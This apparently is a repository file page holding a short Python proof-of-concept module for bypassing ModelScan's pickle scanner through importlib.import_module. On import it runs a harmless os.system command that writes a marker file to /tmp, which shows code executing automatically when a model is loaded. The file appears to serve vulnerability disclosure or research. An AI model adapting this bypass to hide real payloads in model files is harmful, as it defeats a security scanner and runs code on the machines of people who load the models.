xiaoyaoes's picture
ModelScan PickleUnsafeOpScan bypass via importlib.import_module
d5b3716 verified
"""
Demonstration malicious module for ModelScan bypass PoC.
When imported, automatically executes arbitrary code.
"""
import os
# RCE payload — executes on import
os.system("echo 'MODELSCAN_IMPORTLIB_BYPASS_SUCCESS' > /tmp/modelscan_bypass.txt")